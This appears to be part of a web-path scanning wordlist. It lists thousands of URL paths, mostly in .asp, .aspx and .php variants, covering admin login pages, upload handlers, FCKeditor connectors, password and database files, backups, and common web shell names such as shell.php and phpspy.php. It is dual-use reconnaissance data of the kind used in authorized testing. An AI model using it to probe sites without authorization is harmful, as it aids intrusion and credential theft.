/LookupPass.aspx
/LookupPass.php
/lost
/lost/
/lostpass.asp
/lostpass.aspx
/lostpass.php
/Lotus_Domino_Admin
/love.asp
/love.aspx
/love.php
/lovebaobao.asp
/lovebaobao.aspx
/lovebaobao.php
/luck.asp
/luck.aspx
/luck.php
/lyb/
/lyb/admin_login.asp
/lyb/admin_login.aspx
/lyb/admin_login.php
/lyb/login.asp
/lyb/login.aspx
/lyb/login.php
/lygofa.asp
/lygofa.aspx
/lygofa.php
/lzwadmin/
/m
/m.asp
/m.aspx
/m.php
/m/
/m_login.asp
/m_login.aspx
/m_login.php
/ma.asp
/ma.aspx
/ma.php
/macadmin
/mail
/mail/
/maillist.mdb
/mails
/mails/
/Main
/main.asp
/main.aspx
/main.php
/main/
/main/login
/main/login.asp
/main/login.aspx
/main/login.php
/main1.as
/main1.asp
/main1.aspx
/main1.php
/mainframe.asp
/mainframe.aspx
/mainframe.php
/MainLogin
/MainTain
/maintain.asp
/maintain.aspx
/maintain.php
/MainTain/
/maintenance
/man.asp
/man.aspx
/man.php
/manage
/manage.asp
/manage.aspx
/manage.php
/manage/
/manage/admin.asp
/manage/admin.aspx
/manage/admin.php
/manage/admin_index.asp
/manage/admin_index.aspx
/manage/admin_index.php
/manage/admin_login.asp
/manage/admin_login.aspx
/manage/admin_login.php
/manage/AdminLogin.asp
/manage/AdminLogin.aspx
/manage/AdminLogin.php
/manage/Edit/admin_login.asp
/manage/Edit/admin_login.aspx
/manage/Edit/admin_login.php
/manage/Edit/db/ewebeditor.mdb
/manage/Editor/admin_login.asp
/manage/Editor/admin_login.aspx
/manage/Editor/admin_login.php
/manage/Editor/db/ewebeditor.mdb
/manage/eweb/admin_login.asp
/manage/eweb/admin_login.aspx
/manage/eweb/admin_login.php
/manage/eWeb/db/ewebeditor.mdb
/manage/eWebEditor/admin_login.asp
/manage/eWebEditor/admin_login.aspx
/manage/eWebEditor/admin_login.php
/manage/eWebEditor/db/ewebeditor.mdb
/manage/eWebEditor_v280_Free/admin_login.asp
/manage/eWebEditor_v280_Free/admin_login.aspx
/manage/eWebEditor_v280_Free/admin_login.php
/manage/eWebEditor_v280_Free/db/ewebeditor.mdb
/manage/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
/manage/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx
/manage/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php
/manage/FCKeditor/editor/filemanager/upload/test.html
/manage/htmedit/admin_login.asp
/manage/htmedit/admin_login.aspx
/manage/htmedit/admin_login.php
/manage/htmedit/db/ewebeditor.mdb
/manage/index.asp
/manage/index.aspx
/manage/index.php
/manage/login.asp
/manage/login.aspx
/manage/login.php
/manage/login/Login.asp
/manage/login/Login.aspx
/manage/login/Login.php
/manage/upfile.asp
/manage/upfile.aspx
/manage/upfile.php
/manage/WebEdit/admin_login.asp
/manage/WebEdit/admin_login.aspx
/manage/WebEdit/admin_login.php
/manage/WebEdit/db/ewebeditor.mdb
/manage/WebEditor/admin_login.asp
/manage/WebEditor/admin_login.aspx
/manage/WebEditor/admin_login.php
/manage/WebEditor/db/ewebeditor.mdb
/manage_admin/
/Manage_Auto/
/Manage_backup.asp
/Manage_backup.asp?action=Backup
/Manage_backup.aspx
/Manage_backup.aspx?action=Backup
/Manage_backup.php
/Manage_backup.php?action=Backup
/manage_index
/manage_index.asp
/manage_index.aspx
/manage_index.php
/manage_index/
/manage_login.asp
/manage_login.aspx
/manage_login.php
/manage_news/
/manage123/
/manage888/
/ManageAdmin/
/ManageLogin.asp
/ManageLogin.aspx
/ManageLogin.php
/management
/management/login.asp
/management/login.aspx
/management/login.php
/managenews/
/manager
/manager.asp
/manager.aspx
/manager.htm
/manager.php
/manager/
/manager/admin.asp
/manager/admin.aspx
/manager/admin.php
/manager/admin/admin_login.asp
/manager/admin/admin_login.aspx
/manager/admin/admin_login.php
/manager/admin_index.asp
/manager/admin_index.aspx
/manager/admin_index.php
/manager/admin_login.asp
/manager/admin_login.aspx
/manager/admin_login.php
/manager/index.asp
/manager/index.aspx
/manager/index.php
/manager/left.asp
/manager/left.aspx
/manager/left.php
/manager/login
/manager/login.asp
/manager/login.aspx
/manager/login.php
/manager/manager.asp
/manager/manager.aspx
/manager/manager.php
/manager/ndex.asp
/manager/ndex.aspx
/manager/ndex.php
/manager_admin/
/Manager_Login
/manager_login.asp
/manager_login.aspx
/manager_login.php
/Manager_Login/
/Managers
/managers.asp
/managers.aspx
/managers.php
/Managers/
/manages.asp
/manages.aspx
/manages.php
/manga
/manga/
/mangas
/mangas/
/manual
/manual.asp
/manual.aspx
/manual.php
/manual/
/manuallogin
/Master
/master.asp
/master.aspx
/master.php
/master/memmng/login.asp
/master/memmng/login.aspx
/master/memmng/login.php
/mba/
/md5.asp
/md5.aspx
/md5.php
/mdb.asp
/mdb.aspx
/mdb.php
/mem/login.asp
/mem/login.aspx
/mem/login.php
/member
/member.asp
/member.aspx
/member.php
/member/
/member/admin.asp
/member/admin.aspx
/member/admin.php
/member/login.asp
/member/login.aspx
/member/login.php
/member_download.asp
/member_download.aspx
/member_download.php
/member_list.asp
/member_list.aspx
/member_list.php
/MemberLogin
/memberlogin.asp
/memberlogin.aspx
/memberlogin.php
/MemberLogin/
/members
/members.asp
/members.aspx
/members.php
/members/
/members-only
/memlogin
/memmng/
/menu.asp
/menu.aspx
/menu.htm
/menu.html
/menu.php
/menu/
/messy
/messy/
/meta_login
/mg/Login.asp
/mg/Login.aspx
/mg/Login.php
/Mgr
/mgr.asp
/mgr.aspx
/mgr.php
/Mgr/
/mima.txt
/mirror
/mirror/
/mirrors
/mirrors/
/misc
/misc.asp
/misc.aspx
/misc.php
/misc/
/mm.asp
/mm.aspx
/mm.php
/Mmgr
/mmgr.asp
/mmgr.aspx
/mmgr.php
/Mmgr/
/mmm.asp
/mmm.aspx
/mmm.php
/mms/
/moban.asp
/moban.aspx
/moban.php
/mod
/mod/
/modelsearch/login.asp
/modelsearch/login.aspx
/modelsearch/login.php
/moderator
/moderator.asp
/moderator.aspx
/moderator.html
/moderator.php
/moderator/admin.asp
/moderator/admin.aspx
/moderator/admin.html
/moderator/admin.php
/moderator/login.asp
/moderator/login.aspx
/moderator/login.html
/moderator/login.php
/mods
/mods/
/module
/module/
/mon
/mon/
/monitor
/monitor/
/monitors
/monitors/
/more.asp
/more.aspx
/more.php
/movies
/movies/
/mrtg.asp
/mrtg.aspx
/mrtg.php
/Ms-admin/
/muma.asp
/muma.aspx
/muma.php
/my.asp
/my.aspx
/my.php
/myadmin
/myadmin.asp
/myadmin.aspx
/myadmin.php
/myadmin/
/Mybbs
/Mybbs/
/mybbssaveup.asp
/mybbssaveup.aspx
/mybbssaveup.php
/mydatazw/
/mylink.asp
/mylink.aspx
/mylink.php
/My-login.asp
/My-login.aspx
/My-login.php
/mymm.asp
/mymm.aspx
/mymm.php
/mystat/
/myup.asp
/myup.aspx
/myup.php
/mywebshell.asp
/mywebshell.aspx
/mywebshell.php
/n
/n/
/navSiteAdmin
/neeao.txt
/Neeao_sql_admin.asp
/Neeao_sql_admin.aspx
/Neeao_sql_admin.php
/Neeao_SqlIn.Asp
/Neeao_SqlIn.aspx
/Neeao_SqlIn.php
/net/
/new
/new.asp
/new.aspx
/new.php
/New/
/new/admin_index.asp
/new/admin_index.aspx
/new/admin_index.php
/new/Admin_New/default.asp
/new/Admin_New/default.aspx
/new/Admin_New/default.php
/NewAdmin
/newadmin.asp
/newadmin.aspx
/newadmin.php
/NewAdmin/
/Newbbs
/newbbs/
/newbbs/login
/newbbs/login.asp
/newbbs/login.aspx
/newbbs/login.php
/NewFile.txt
/newhome
/newhome/
/newmm.asp
/newmm.aspx
/newmm.php
/News
/news.asp
/news.aspx
/news.php
/news/
/news/admin/default.asp
/news/admin/default.aspx
/news/admin/default.php
/news/admin/upfile.asp
/news/admin/upfile.aspx
/news/admin/upfile.php
/news/admin_login.asp
/news/admin_login.aspx
/news/admin_login.php
/news/login.asp
/news/login.aspx
/news/login.php
/news/manage/login.asp
/news/manage/login.aspx
/news/manage/login.php
/news/newadmin/
/news/newadmin/test.asp
/news/newadmin/test.aspx
/news/newadmin/test.php
/News_Admin
/news_admin.asp
/news_admin.aspx
/news_admin.php
/News_Admin/
/news_list.asp
/news_list.aspx
/news_list.php
/news3000.asp
/news3000.aspx
/news3000.php
/newsadmin
/newsadmin.asp
/newsadmin.aspx
/newsadmin.php
/newsadmin/
/newsimage1.asp
/newsimage1.aspx
/newsimage1.php
/newslogin.htm.
/newsupfile.asp
/newsupfile.aspx
/newsupfile.php
/NewsUpLoad.asp
/NewsUpLoad.aspx
/NewsUpLoad.php
/NewWeb
/NewWeb/
/newz
/newz/
/o
/o/
/oask.asp
/oask.aspx
/oask.php
/Office
/office.asp
/office.aspx
/office.aspxx
/office.jsp
/office.php
/office.phpx
/Office/
/office/login.asp
/office/login.aspx
/office/login.php
/oh
/oh/
/Ok
/ok.asp
/ok.aspx
/ok.php
/Ok/
/ok_pass.asp
/ok_pass.aspx
/ok_pass.php
/old
/old/
/Oldbbs
/oldbbs/
/older
/older/
/oldies
/oldies/
/Oldweb
/Oldweb/
/open.asp
/open.asp.bak
/open.aspx
/open.aspx.bak
/open.php
/open.php.bak
/openvpnadmin
/organise.asp
/organise.aspx
/organise.php
/Other
/other.asp
/other.aspx
/other.php
/Other/
/p
/p/
/packet.mdb
/panel
/pass
/pass.asp
/pass.aspx
/pass.php
/pass.txt
/pass/
/passwd.asp
/passwd.aspx
/passwd.php
/password
/password.asp
/password.aspx
/password.php
/password.txt
/password/
/password_search.asp
/password_search.aspx
/password_search.php
/passwords
/passwords/
/passwordz
/passwordz/
/PayOnline/
/PBlog1.asp
/PBlog1.aspx
/PBlog1.php
/PBlog2.asp
/PBlog2.aspx
/PBlog2.php
/PBlog3.asp
/PBlog3.aspx
/PBlog3.php
/pers
/pers/
/perso
/perso/
/personnal
/personnal/
/pgadmin
/photo
/photo.asp
/photo.aspx
/photo.php
/photo/
/photos
/photos/
/photosave.asp
/photosave.aspx
/photosave.php
/php_Admin
/php_Admin/
/phpcmd.asp
/phpcmd.aspx
/phpcmd.php
/phpeditor/
/phpinfo.asp
/phpinfo.aspx
/phpinfo.php
/phpldapadmin
/phpmyadmin
/PhpMyAdmin/
/phppgadmin
/phpspy.asp
/phpspy.aspx
/phpspy.php
/phpSQLiteAdmin
/pic
/pic/
/picpost
/picpost/
/picposts
/picposts/
/pics
/pics/
/picture
/picture/
/pictures
/pictures/
/picturez
/picturez/
/picupload.asp
/picupload.aspx
/picupload.php
/picupsave.asp
/picupsave.aspx
/picupsave.php
/picupsave2.asp
/picupsave2.aspx
/picupsave2.php
/picz
/PJBLOG/
/platz_login
/play.asp
/play.aspx
/play.php
/popup.asp
/popup.aspx
/popup.htm
/popup.php
/post
/post/
/post_upfile.asp
/post_upfile.aspx
/post_upfile.php
/post_upload.asp
/post_upload.aspx
/post_upload.php
/power
/power/
/power_user
/ppbd.asp
/ppbd.aspx
/ppbd.php
/preview
/preview/
/PreviewImage/
/previews
/previews/
/previewz
/previewz/
/priv
/priv/
/private
/private.asp
/private.aspx
/private.php
/private/
/product
/Product/
/Product/Manage
/Product/Manage/
/Product/manage/login.asp
/Product/manage/login.aspx
/Product/manage/login.php
/products
/products/
/profile/
/profile/login.asp
/profile/login.aspx
/profile/login.php
/prog
/prog/
/program
/program.asp
/program.aspx
/program.php
/program/
/programming.asp
/programming.aspx
/programming.php
/programming/
/programs
/programs.asp
/programs.aspx
/programs.php
/programs/
/project/
/project/webpet/login.asp
/project/webpet/login.aspx
/project/webpet/login.php
/project-admins
/protect
/protect/
/protected
/protected/
/prv
/prv/
/pscms_admin/
/pub
/pub/
/public
/public.asp
/public.aspx
/public.php
/public/
/puppy
/puppy/
/pureadmin
/pwd
/pwd/
/pwds
/pwds/
/q
/q/
/qq.txt
/Qybz/
/qyjxy.asp
/qyjxy.aspx
/qyjxy.php
/qyml/upproduce.asp
/qyml/upproduce.aspx
/qyml/upproduce.php
/r
/r/
/radmind
/radmind-1
/rcLogin
/readme.asp
/readme.aspx
/readme.htm
/readme.html
/readme.php
/readme.txt
/Reg
/reg.asp
/reg.aspx
/reg.php
/Reg/
/reg_upload.asp
/reg_upload.aspx
/reg_upload.php
/reg_upload1.asp
/reg_upload1.aspx
/reg_upload1.php
/reg_user.asp
/reg_user.aspx
/reg_user.php
/Register
/register.asp
/register.aspx
/register.php
/Register/
/reload.asp
/reload.aspx
/reload.php
/report
/report/
/reports
/reports/
/review
/review/
/reviews
/reviews/
/robots.txt
/roha.asp
/roha.aspx
/roha.php
/Root
/root.asa
/root.asp
/root.aspx
/root.php
/root/
/root/login.asp
/root/login.aspx
/root/login.php
/rootceo.asp
/rootceo.aspx
/rootceo.php
/rss.asp
/rss.aspx
/rss.php
/rss1.asp
/rss1.aspx
/rss1.php
/rss2.asp
/rss2.aspx
/rss2.php
/rssfree.asp
/rssfree.aspx
/rssfree.php
/run
/run/
/s
/s/
/s_image.asp
/s_image.aspx
/s_image.htm
/s_image.php
/SAdmin
/sadmin.asp
/sadmin.aspx
/sadmin.php
/SAdmin/
/Saveannounce_upload.asp
/Saveannounce_upload.aspx
/Saveannounce_upload.php
/savecomment.asp
/savecomment.aspx
/savecomment.php
/savelogin.asp
/savelogin.aspx
/savelogin.php
/savemessage.asp
/savemessage.aspx
/savemessage.php
/saveup.asp
/saveup.aspx
/saveup.php
/saveupload.asp
/saveupload.aspx
/saveupload.php
/ScanShell.asp
/ScanShell.aspx
/ScanShell.php
/script
/script/
/scripts
/scripts/
/search.asp
/search.aspx
/search.php
/secret
/secret.asp
/secret.aspx
/secret.php
/secret/
/secrets
/secrets.asp
/secrets.aspx
/secrets.php
/secrets/
/secure
/secure/
/security
/security/
/Select_feedback.asp
/Select_feedback.aspx
/Select_feedback.php
/SEM_User/
/serial
/serial/
/serials
/serials/
/serialz
/serialz/
/Server
/Server.asp
/Server.aspx
/Server.html
/Server.php
/server_admin_small
/server_stats
/server_stats.asp
/server_stats.aspx
/server_stats.php
/server_stats/
/ServerAdministrator
/server-info.asp
/server-info.aspx
/server-info.php
/server-status.asp
/server-status.aspx
/server-status.php
/service
/service/
/services
/services/
/servu.asp
/servu.aspx
/servu.php
/set
/set.asp
/set.aspx
/set.php
/set/
/setting.asp
/setting.aspx
/setting.php
/setting/
/settings
/setup
/setup.asp
/setup.asp.bak
/setup.aspx
/setup.aspx.bak
/setup.php
/setup.php.bak
/setup/
/sever.asp
/sever.aspx
/sever.php
/sex
/sex/
/sexy
/sexy/
/shell.asp
/shell.aspx
/shell.php
/shemales
/shemales/
/shipin.asp
/shipin.aspx
/shipin.php
/shop/
/Shop/Admin
/Shop/Admin/
/Shop_Login.htm
/shopadmin/
/shopb2b_sysdata.asp
/shopb2b_sysdata.aspx
/shopb2b_sysdata.php
/show.asp
/show.aspx
/show.php
/show/
/Show/Back
/Show/Back/
/show/back/index.asp
/show/back/index.aspx
/show/back/index.php
/showimg.asp
/showimg.aspx
/showimg.php
/showlogin
/shownews.asp
/shownews.aspx
/shownews.php
/shtml
/shtml/
/simpleLogin
/Site
/site.asp
/site.aspx
/site.php
/site.rar
/Site/
/sitemap.xml
/sitemap/
/sjk2008/
/Skin/
/Skins/
/Skyj.asp
/Skyj.aspx
/Skyj.php
/SManager
/smanager.asp
/smanager.aspx
/smanager.php
/SManager/
/smblogin
/smhththt/
/snmp.asp
/snmp.aspx
/snmp.php
/soft_admin.asp
/soft_admin.aspx
/soft_admin.aspxx
/soft_admin.jsp
/soft_admin.php
/soft_admin.phpx
/solution
/solution/
/solutions
/solutions/
/source
/source.asp
/source.aspx
/source.php
/source/
/sources.asp
/sources.aspx
/sources.php
/sources/
/SouthidcEditor/
/spy.asp
/spy.aspx
/spy.php
/spzs/
/Sql
/sql.asp
/sql.aspx
/sql.php
/Sql/
/sql-admin
/SqlConf
/sqlconf.asp
/sqlconf.aspx
/sqlconf.php
/SqlConf/
/sqlin.asp
/sqlin.aspx
/sqlin.php
/ss_vms_admin_sm
/sshadmin
/st-admin/
/star.asp
/star.aspx
/star.php
/staradmin
/starark.asp 
/starark.aspx 
/starark.php 
/stat
/stat.asp
/stat.aspx
/stat.php
/stat/
/statistics
/statistics.asp
/statistics.aspx
/statistics.php
/statistics/
/stats
/Stats.asp
/Stats.aspx
/Stats.php
/Stats/
/stock/
/stock/login.asp
/stock/login.aspx
/stock/login.php
/Store
/store.asp
/store.aspx
/store.php
/Store/
/Stores
/Stores/
/Ststems
/ststems.asp
/ststems.aspx
/ststems.php
/ststems/
/stuff
/stuff/
/su.asp
/su.aspx
/su.php
/sub_upload.asp
/sub_upload.aspx
/sub_upload.php
/sub-login
/super
/super.asp
/super.aspx
/super.php
/super/
/super1.asp
/super1.aspx
/super1.php
/Super-Admin
/supervise
/supervise/
/supervise/Login.asp
/supervise/Login.aspx
/supervise/Login.php
/supervisor
/supervisor/
/SupplierAdm
/supplieradm.asp
/supplieradm.aspx
/supplieradm.php
/SupplierAdm/
/support
/support/
/support_login
/suzhijy/
/sxadmin/
/sxadmin/index.asp
/sxadmin/index.aspx
/sxadmin/index.php
/Sys
/sys.asp
/sys.aspx
/sys.php
/sys/
/sys//asjobcom/
/sys/admin/login.asp
/sys/admin/login.aspx
/sys/admin/login.php
/sys/login.asp
/sys/login.aspx
/sys/login.php
/sys/login/
/Sys_admin.asp
/Sys_admin.aspx
/Sys_admin.php
/sys_admin/
/Sys_Login
/sys_login.asp
/sys_login.aspx
/sys_login.php
/Sys_Login/
/sys_login_easysite.asp
/sys_login_easysite.aspx
/sys_login_easysite.php
/sys_manage/sys_index.asp
/sys_manage/sys_index.aspx
/sys_manage/sys_index.php
/sys_memu.asp
/sys_memu.aspx
/sys_memu.php
/sysadm_index.asp
/sysadm_index.aspx
/sysadm_index.php
/sysadm_login.asp
/sysadm_login.aspx
/sysadm_login.php
/SysAdmin
/sys-admin
/sysadmin.asp
/sysadmin.aspx
/sysadmin.html
/sysadmin.php
/SysAdmin/
/SysAdmin/login.asp
/SysAdmin/login.aspx
/SysAdmin/login.php
/SysAdmin2
/sysadmins
/sysadmins.asp
/sysadmins.aspx
/sysadmins.php
/SysAdmins/
/syscode.asp
/syscode.asp.bak
/syscode.aspx
/syscode.aspx.bak
/syscode.php
/syscode.php.bak
/syslog.asp
/syslog.aspx
/syslog.php
/syslogi.asp
/syslogi.aspx
/syslogi.php
/SysLogin
/syslogin.asp
/syslogin.aspx
/syslogin.php
/SysManage/
/SysManager
/SysManager/
/System
/system.asp
/system.aspx
/system.php
/System/
/system/default.asp
/system/default.aspx
/system/default.php
/system/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
/system/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx
/system/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php
/system/FCKeditor/editor/filemanager/upload/test.html
/System/Function/UploadProductPic.asp
/System/Function/UploadProductPic.aspx
/System/Function/UploadProductPic.php
/system/index.asp
/system/index.aspx
/system/index.php
/System/Login
/system/login.asp
/system/login.aspx
/system/login.php
/system/login/
/system/manage.asp
/system/manage.aspx
/system/manage.php
/system/manage/index.asp
/system/manage/index.aspx
/system/manage/index.php
/system_admin/
/system_administration
/systemadmin/
/system-administration
/systemceo.asp
/systemceo.aspx
/systemceo.php
/systemroot.asp
/systemroot.aspx
/systemroot.php
/Systems
/systems.asp
/systems.aspx
/systems.php
/Systems/
/Systems/Login
/systems/login.asp
/systems/login.aspx
/systems/login.php
/systems/login/
/SysUser.asp
/SysUser.aspx
/SysUser.php
/sytle.asp
/sytle.aspx
/sytle.php
/szwyadmin/
/szwyadmin/login.asp
/szwyadmin/login.aspx
/szwyadmin/login.php
/t
/t/
/tab
/tab/
/tacforo/
/tacforo/admin_login.asp
/tacforo/admin_login.aspx
/tacforo/admin_login.php
/tb.asp
/tb.aspx
/tb.php
/teen
/teen/
/Teens
/Teens/
/teenz
/teenz/
/telephone
/telephone.asp
/telephone.aspx
/telephone.php
/telephone/
/temp
/temp.asp
/temp.aspx
/temp.php
/temp/
/temp_admin.asp
/temp_admin.aspx
/temp_admin.php
/temporary.asp
/temporary.aspx
/temporary.php
/Test
/test.asp
/test.asp.bak
/test.aspx
/test.aspx.bak
/test.php
/test.php.bak
/test.txt
/Test/
/test_download.asp
/test_download.aspx
/test_download.php
/test_page.asp
/test_page.aspx
/test_page.php
/test_upload.asp
/test_upload.aspx
/test_upload.php
/test1.asa
/test1.asp
/test1.aspx
/test1.php
/tester.asp
/tester.aspx
/tester.php
/tester_download.asp
/tester_download.aspx
/tester_download.php
/texteditor
/texteditor/
/thumb
/thumb/
/thumbs
/thumbs/
/thumbz
/thumbz/
/tiyisw.asp
/tiyisw.aspx
/tiyisw.php
/tjly.asp
/tjly.aspx
/tjly.php
/tmp
/tmp/
/today
/today/
/tongji/
/tool.asp
/tool.aspx
/tool.php
/tools.asp
/tools.aspx
/tools.php
/top
/top.asp
/top.aspx
/top.htm
/top.html
/top.php
/top/
/tot_dabase/
/toucher/
/toucher/admin_login.asp
/toucher/admin_login.aspx
/toucher/admin_login.php
/Trade
/Trade/
/Trade/Admin
/trade/admin/Login.asp
/trade/admin/Login.aspx
/trade/admin/Login.php
/tradeLogin.asp
/tradeLogin.aspx
/tradeLogin.php
/tryread/
/tryread/forbook1.asp   
/tryread/forbook1.aspx   
/tryread/forbook1.php   
/tungou/
/typo3
/u
/u/
/union//vip_manage/
/union/admin.asp
/union/admin.aspx
/union/admin.php
/up
/up.asp
/up.aspx
/up.php
/up/
/Up_BookPicPro.asp
/Up_BookPicPro.aspx
/Up_BookPicPro.php
/update
/update.asp
/update.aspx
/update.php
/update/
/update_user.asp
/update_user.aspx
/update_user.php
/UpdDate
/UpdDate/
/upfile.asp
/upfile.aspx
/upfile.php
/upfile/
/upfile_article.asp
/upfile_article.aspx
/upfile_article.php
/upfile_Dialog.asp
/upfile_Dialog.aspx
/upfile_Dialog.php
/upfile_flash.asp
/upfile_flash.aspx
/upfile_flash.php
/upfile_Other.asp
/upfile_Other.aspx
/upfile_Other.php
/upfile_photo.asp
/upfile_photo.aspx
/upfile_photo.php
/Upfile_pic.asp
/Upfile_pic.aspx
/Upfile_pic.php
/Upfile_pics.asp
/Upfile_pics.aspx
/Upfile_pics.php
/Upfile_Product.asp
/Upfile_Product.aspx
/Upfile_Product.php
/Upfile_ProductPic.asp
/Upfile_ProductPic.aspx
/Upfile_ProductPic.php
/upfile_soft.asp
/upfile_soft.aspx
/upfile_soft.php
/Upfile_SoftPic.asp
/Upfile_SoftPic.aspx
/Upfile_SoftPic.php
/upfile1.asp
/upfile1.aspx
/upfile1.php
/upfile2.asp
/upfile2.aspx
/upfile2.php
/upfile3.asp
/upfile3.aspx
/upfile3.php
/upfilea.asp
/upfilea.aspx
/upfilea.php
/Upfiledd.asp
/Upfiledd.aspx
/Upfiledd.php
/Upfilem.asp
/Upfilem.aspx
/Upfilem.php
/Upfilep.asp
/Upfilep.aspx
/Upfilep.php
/upfiles.asp
/upfiles.aspx
/upfiles.php
/upfilexinxi.asp
/upfilexinxi.aspx
/upfilexinxi.php
/upimg.asp
/upimg.aspx
/upimg.htm
/upimg.html
/upimg.php
/upl
/upl/
/Upload
/upload.asp
/upload.asp?action=upfile
/upload.aspx
/upload.aspx?action=upfile
/upload.htm
/upload.html
/upload.inc
/upload.php
/upload.php?action=upfile
/upload/
/upload/upload.asp
/upload/upload.aspx
/upload/upload.php
/upload_add.asp
/upload_add.aspx
/upload_add.htm
/upload_add.html
/upload_add.php
/upLoad_bm1.asp
/upLoad_bm1.aspx
/upLoad_bm1.php
/upload_browse.asp
/upload_browse.aspx
/upload_browse.php
/upLoad_c1.asp
/upLoad_c1.aspx
/upLoad_c1.php
/upload_flash.asp
/upload_flash.aspx
/upload_flash.php
/upload_flash_.asp
/upload_flash_.aspx
/upload_flash_.php
/upload_new_ad.asp
/upload_new_ad.aspx
/upload_new_ad.htm
/upload_new_ad.html
/upload_new_ad.php
/Upload_Photo.asp
/Upload_Photo.aspx
/Upload_Photo.php
/Upload_ProductPic.asp
/Upload_ProductPic.aspx
/Upload_ProductPic.php
/upload_soft.asp
/upload_soft.aspx
/upload_soft.php
/upload1.asp
/upload1.aspx
/upload1.php
/upload2.asp
/upload2.aspx
/upload2.php
/upload3.asp
/upload3.aspx
/upload3.php
/uploada.asp
/uploada.aspx
/uploada.php
/Uploaddd.asp
/Uploaddd.aspx
/Uploaddd.php
/UploadFace.asp
/UploadFace.aspx
/UploadFace.php
/UploadFace/
/uploadfaceok.asp
/uploadfaceok.aspx
/uploadfaceok.php
/UploadFile/
/uploadfiles.asp
/uploadfiles.aspx
/uploadfiles.php
/uploadfiles1.asp
/uploadfiles1.aspx
/uploadfiles1.php
/uploadfilm.asp
/uploadfilm.aspx
/uploadfilm.php
/UploadImage3_upload.asp
/UploadImage3_upload.aspx
/UploadImage3_upload.php
/uploadphoto.asp
/uploadphoto.aspx
/uploadphoto.php
/uploadPic.asp
/uploadPic.aspx
/uploadPic.php
/UploadProductPic.asp
/UploadProductPic.aspx
/UploadProductPic.php
/uploads
/uploads/
/UploadSoft/
/UploadSoft/diy.asp
/UploadSoft/diy.aspx
/UploadSoft/diy.php
/uploadz
/uploadz/
/upme1.asp
/upme1.aspx
/upme1.htm
/upme1.php
/upme2.asp
/upme2.aspx
/upme2.htm
/upme2.php
/upNewsIMg.asp
/upNewsIMg.aspx
/upNewsIMg.php
/upproduce.asp
/upproduce.aspx
/upproduce.php
/upsave.asp
/upsave.aspx
/upsave.php
/ur-admin
/ur-admin.asp
/ur-admin.aspx
/ur-admin.html
/ur-admin.php
/us
/us/
/usage.asp
/usage.aspx
/usage.php
/usage/
/user
/user.asp
/user.aspx
/user.php
/user/
/user/admin.asp
/user/admin.aspx
/user/admin.php
/user/index.asp
/user/index.aspx
/user/index.php
/user/login.asp
/user/login.aspx
/user/login.php
/user/logout.asp
/user/logout.aspx
/user/logout.php
/user/super.asp
/user/super.aspx
/user/super.php
/User_Admin
/user_admin.asp
/user_admin.aspx
/user_admin.php
/User_Admin/
/user_Default.asp?
/user_Default.aspx?
/user_Default.php?
/user_files.asp
/user_files.aspx
/user_files.php
/user_friends.asp
/user_friends.aspx
/user_friends.php
/User_GetPassword.asp
/User_GetPassword.aspx
/User_GetPassword.php
/user_help.asp
/user_help.aspx
/user_help.php
/user_index.asp
/user_index.aspx
/user_index.php
/User_Login
/user_login.asp
/user_login.aspx
/user_login.php
/User_Login/
/user_message.asp
/user_message.aspx
/user_message.php
/user_messages.asp
/user_messages.aspx
/user_messages.php
/user_setting.asp
/user_setting.aspx
/user_setting.php
/user_subject.asp
/user_subject.aspx
/user_subject.php
/user_top.asp
/user_top.aspx
/user_top.php
/user_update.asp
/user_update.aspx
/user_update.php
/user_upfile.asp
/user_upfile.aspx
/user_upfile.php
/useradmin
/userDefault.asp?
/userDefault.aspx?
/userDefault.php?
/usergroup_0.asp
/usergroup_0.aspx
/usergroup_0.php
/UserList.asp
/UserList.aspx
/UserList.php
/UserLogin
/UserLogin.asp
/UserLogin.aspx
/UserLogin.php
/userlook.asp
/userlook.aspx
/userlook.php
/usermanage/
/USERok.asp
/USERok.aspx
/USERok.php
/userreg_setp2.asp
/userreg_setp2.aspx
/userreg_setp2.php
/users
/users.asp
/users.aspx
/users.php
/users/
/userslist.asp
/userslist.aspx
/userslist.php
/usr
/usr/
/usrs
/usrs/
/utility_login
/v
/v/
/vadmind
/valid
/valid/
/validate
/validate/
/validated
/validated/
/ver.asp
/ver.aspx
/ver.php
/vip_manage/login.asp
/vip_manage/login.aspx
/vip_manage/login.php
/vipuser.asp
/vipuser.aspx
/vipuser.php
/vipuser_login.asp
/vipuser_login.aspx
/vipuser_login.php
/virgin/
/vmailadmin
/vo_login.asp
/vo_login.aspx
/vo_login.php
/vote.asp
/vote.aspx
/vote.php
/w
/w/
/wantpws.asp
/wantpws.aspx
/wantpws.php
/wap/
/warez
/warez/
/warning.asp
/warning.aspx
/warning.php
/web
/web.config
/web.rar
/web.zip
/Web/
/web_admin/
/Web_Editor/
/web_login.asp
/web_login.aspx
/web_login.php
/Web_Master
/Web_Master/
/web_upfile.asp
/web_upfile.aspx
/web_upfile.php
/Web1
/Web1/
/Web2
/Web2/
/webadmin
/webadmin.asp
/webadmin.aspx
/webadmin.html
/webadmin.php
/WebAdmin/
/WebApps
/WebApps/
/webconfig.asp
/webconfig.aspx
/webconfig.php
/webDefault.asp?
/webDefault.aspx?
/webDefault.php?
/webedit/admin_login.asp
/webedit/admin_login.aspx
/webedit/admin_login.php
/WebEdit/db/ewebeditor.mdb
/webedit1/admin_login.asp
/webedit1/admin_login.aspx
/webedit1/admin_login.php
/webedit1/db/ewebeditor.mdb
/webeditor/
/WebEditor/admin_login.asp
/WebEditor/admin_login.aspx
/WebEditor/admin_login.php
/WebEditor/db/ewebeditor.mdb
/webhome
/webhome/
/weblog.asp
/weblog.aspx
/weblog.php
/weblog/
/weblogs.asp
/weblogs.aspx
/weblogs.php
/weblogs/
/webmaster
/webmaster.asp
/webmaster.aspx
/webmaster.php
/webmaster/
/webmis/
/webpet/
/webshell.asp
/webshell.aspx
/webshell.php
/webstats.asp
/webstats.aspx
/webstats.php
/webstats/
/websvn
/WeiHu
/WeiHu/
/weihu/login.asp
/weihu/login.aspx
/weihu/login.php
/wen_login.asp
/wen_login.aspx
/wen_login.php
/wenzhang
/wenzhang.asp
/wenzhang.aspx
/wenzhang.php
/wenzhang/
/whj/
